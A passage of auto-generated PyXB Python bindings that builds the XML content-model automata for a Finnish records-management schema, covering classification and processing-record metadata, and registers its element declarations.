    cc_6 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_6)
    cc_7 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_7)
    cc_8 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_8)
    cc_9 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_9)
    cc_10 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_10)
    cc_11 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_11)
    cc_12 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_12)
    cc_13 = fac.CounterCondition(min=0, max=None, metadata=None)
    counters.add(cc_13)
    # One state per element particle.  st_0..st_9 are possible initial
    # states (the preceding elements are all optional); only st_12..st_15
    # carry a final_update set, i.e. only they can be accepting states.
    states = []
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi')), None)
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi')), None)
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm')), None)
    st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi')), None)
    st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm')), None)
    st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi')), None)
    st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm')), None)
    st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_6)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm')), None)
    st_7 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_7)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm')), None)
    st_8 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_8)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Luokitustunnus')), None)
    st_9 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_9)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi')), None)
    st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_10)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OsaVersio')), None)
    st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_11)
    # st_12 (Nimeke): accepting with no counter conditions to discharge.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Nimeke')), None)
    st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_12)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_11, False))
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LuokitusKuvausTeksti')), None)
    st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_13)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_12, False))
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessiTiedot')), None)
    st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_14)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_13, False))
    symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
    st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_15)
    # Transition tables.  The recurring pattern is: a self-loop that
    # increments the state's own counter (True), plus forward edges that
    # close the counter (False) and advance to a later particle.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_2, False) ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_3, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_3, False) ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_4, True) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_4, False) ]))
    st_4._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_5, True) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_5, False) ]))
    st_5._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_6, True) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_6, False) ]))
    st_6._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_7, True) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_7, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_7, False) ]))
    st_7._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_8, True) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_8, False) ]))
    st_8._set_transitionSet(transitions)
    # st_9 (Luokitustunnus) advances without touching any counter: the
    # following particles start a fresh sub-sequence.
    transitions = []
    transitions.append(fac.Transition(st_10, [
         ]))
    transitions.append(fac.Transition(st_11, [
         ]))
    transitions.append(fac.Transition(st_12, [
         ]))
    st_9._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_9, True) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_9, False) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_9, False) ]))
    st_10._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_10, True) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_10, False) ]))
    st_11._set_transitionSet(transitions)
    # st_12 (Nimeke) likewise advances with no counter updates.
    transitions = []
    transitions.append(fac.Transition(st_13, [
         ]))
    transitions.append(fac.Transition(st_14, [
         ]))
    transitions.append(fac.Transition(st_15, [
         ]))
    st_12._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_11, True) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_11, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_11, False) ]))
    st_13._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_12, True) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_12, False) ]))
    st_14._set_transitionSet(transitions)
    # st_15 (Laajennos) may repeat indefinitely via unbounded cc_13.
    transitions = []
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_13, True) ]))
    st_15._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the compiled content-model automaton for luokkaTyyppi, then
# register the single element declaration used by nimekeKielellaTyyppi.
luokkaTyyppi._Automaton = _BuildAutomaton_8()
nimekeKielellaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti'), nimekeTekstiTyyppi, scope=nimekeKielellaTyyppi, location=None))
def _BuildAutomaton_9 ():
    """Build the content-model automaton for nimekeKielellaTyyppi.

    The model is a single NimekeTeksti element: one accepting initial
    state with no outgoing transitions and no occurrence counters.
    """
    # This builder runs exactly once; remove it from the module
    # namespace so the generated module does not leak helpers.
    global _BuildAutomaton_9
    del _BuildAutomaton_9
    import pyxb.utils.fac as fac
    element_use = pyxb.binding.content.ElementUse(nimekeKielellaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti')), None)
    # Accepting (empty final_update set) initial state for the sole element.
    sole_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    sole_state._set_transitionSet([])
    return fac.Automaton([sole_state], set(), False, containing_state=None)
# Attach the compiled content-model automaton for nimekeKielellaTyyppi.
nimekeKielellaTyyppi._Automaton = _BuildAutomaton_9()

# Register the element declarations that may appear inside
# kasittelyprosessiTiedotTyyppi.  Several reuse types imported from the
# jhs metarecord binding; the rest are local bindings or plain strings.
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), pyxb.binding.datatypes.string, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti'), pyxb.binding.datatypes.string, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ProsessinOmistajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KokoavanProsessitunnuksenLahdeTeksti'), pyxb.binding.datatypes.string, scope=kasittelyprosessiTiedotTyyppi, location=None))
# 'Laajennos' carries the schema's own documentation string (organisation-specific extension point).
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=kasittelyprosessiTiedotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat'), asiasanatTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot'), toimenpidetiedotTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot'), kayttorajoitusTiedotTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot'), sailytysaikaTiedotTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
def _BuildAutomaton_10 ():
    """Build the FAC (finite automaton with counters) content model for
    ``kasittelyprosessiTiedotTyyppi``.

    Auto-generated by PyXB.  The automaton enforces element order and
    occurrence constraints when validating/parsing instances of the type.
    Counters ``cc_*`` encode particle occurrence bounds (min/max, with
    ``max=None`` meaning unbounded); states ``st_*`` each consume one child
    element; transitions encode the permitted element sequence.

    Returns:
        pyxb.utils.fac.Automaton: the compiled content-model automaton.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_10
    del _BuildAutomaton_10
    import pyxb.utils.fac as fac
    # Occurrence counters: most particles are optional (0..1); cc_1
    # (Toimenpidetiedot), cc_11 (Asiasanat) and cc_15 (Laajennos) are
    # unbounded (0..*).
    counters = set()
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=None, metadata=None)
    counters.add(cc_1)
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_2)
    cc_3 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_3)
    cc_4 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_4)
    cc_5 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_5)
    cc_6 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_6)
    cc_7 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_7)
    cc_8 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_8)
    cc_9 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_9)
    cc_10 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_10)
    cc_11 = fac.CounterCondition(min=0, max=None, metadata=None)
    counters.add(cc_11)
    cc_12 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_12)
    cc_13 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_13)
    cc_14 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_14)
    cc_15 = fac.CounterCondition(min=0, max=None, metadata=None)
    counters.add(cc_15)
    # States: one per child-element particle.  final_update=None means the
    # state cannot terminate the content; a (possibly empty) set means it can,
    # after applying the listed counter-update instructions.
    states = []
    final_update = None
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi')), None)
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = None
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot')), None)
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot')), None)
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot')), None)
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi')), None)
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_3, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi')), None)
    st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_4, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm')), None)
    st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_6)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_5, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi')), None)
    st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_7)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_6, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm')), None)
    st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_8)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_7, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi')), None)
    st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_9)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_8, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm')), None)
    st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_10)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_9, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm')), None)
    st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_11)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_10, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm')), None)
    st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_12)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_11, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat')), None)
    st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_13)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_12, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti')), None)
    st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_14)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_13, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ProsessinOmistajaNimi')), None)
    st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_15)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_14, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'KokoavanProsessitunnuksenLahdeTeksti')), None)
    st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_16)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_15, False))
    symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
    st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_17)
    # Transition tables.  For each state: a self-transition that increments its
    # own occurrence counter (where repetition is allowed), then transitions to
    # every later state, closing (False) the counters of the particles skipped.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
         ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
         ]))
    transitions.append(fac.Transition(st_4, [
         ]))
    transitions.append(fac.Transition(st_5, [
         ]))
    transitions.append(fac.Transition(st_6, [
         ]))
    transitions.append(fac.Transition(st_7, [
         ]))
    transitions.append(fac.Transition(st_8, [
         ]))
    transitions.append(fac.Transition(st_9, [
         ]))
    transitions.append(fac.Transition(st_10, [
         ]))
    transitions.append(fac.Transition(st_11, [
         ]))
    transitions.append(fac.Transition(st_12, [
         ]))
    transitions.append(fac.Transition(st_13, [
         ]))
    transitions.append(fac.Transition(st_14, [
         ]))
    transitions.append(fac.Transition(st_15, [
         ]))
    transitions.append(fac.Transition(st_16, [
         ]))
    transitions.append(fac.Transition(st_17, [
         ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_8, [
